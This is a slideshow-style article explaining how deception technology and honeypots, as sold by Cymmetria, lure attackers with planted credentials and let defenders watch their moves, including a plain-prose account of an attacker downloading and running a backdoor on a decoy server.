The story of the honeypot: A tale of deception

What is a decoy and how do you build a story of deception?

1 honeypot
Credit: Pixabay
Looking at the attacker instead of the attack

Honeypots have been around for decades. Deception elements have been used by network defenders for many years, but deception technology has matured by leveraging the fact that attackers are human, and can make mistakes. Cyber deception takes advantage of these mistakes, leading attackers through a pre-planned path to where the defenders want them to be. Gadi Evron, former vice president of Kaspersky and PricewaterhouseCoopers and now founder and CEO of Cymmetria walked me through the process of a decoy server and showed me how to control information so that attackers are diverted to where you want them to go.

2 crumbs
Credit: Cymmetria
A trail of crumbs

Essentially, the decoy works in the same way the trail of breadcrumbs would. You want the bad actor to follow them to the anticipated destination. The benefit of this deception technique is that you are in control of the information. This image depicts defender's perspective, showing the creation of a breadcrumb that will be placed on an endpoint to be found by attackers who are doing reconnaissance.

3 attacker
Credit: Cymmetria
The attacker perspective

Understanding the behavior of the attacker will help you to lay down a set of breadcrumbs that they will actually want to follow. Here you can see how the decoy looks to an attacker running a data gathering tool on a compromised machine. If you look at the bottom of the screen, you can see that the attacker steals the credentials planted by Cymmetria.

4 deception
Credit: Cymmetria
Deception dashboard

From the point of entry, the deception tool allows you to monitor the actions and pathways of the intruder as s/he traverses through the network. Where did the attacker gain access? How? What credentials are being used? Then, you can use the credentials to lead them toward the decoy service you are running. This image shows an attacker originated from the executive team, went through human resources services, then towards a file server.

5 deception campaign
Credit: Cymmetria
Building a deception campaign

In addition to being able to see the point of entry, the deception dashboard also reveals the technology and tools that the attacker is using once inside the network. All of this information is critical to the deception campaign, which is a story crafted to target advanced attackers. In this deception dashboard, you see management workstations, development servers, and HR workstations. From this information, attackers will harvest credentials and other information that will lead them to decoys.

6 code execution
Credit: Cymmetria
Code execution

After the attacker has nibbled on the breadcrumbs and followed along on the trail of deception, s/he gets to work on executing code. In the decoy (or honeypot) server, you can watch as information is gathered by the malicious actor.

What you see here from the bottom to the top:

The lowest one - the attacker runs wget, a command that lets him download an external file to the compromised server.
The middle one - takes the downloaded file and changes it to be executable
The top one - command runs the downloaded backdoor
7 narrative
Credit: Cymmetria
Building the right narrative

As is true with any story, in order to captivate your audience and persuade them to accept your fictional world as real, you have to lure them in with language. I loved this image of Cymmetria’s Deception (story) Wizard as it presents all of the elements of good story telling. Setting, character, conflict, and suspense are what any author uses in the craft of writing. The trick for the decoy system is no different from the challenge presented to writers of fiction. If your audience doesn't buy into your world, they will not come along on the journey with you.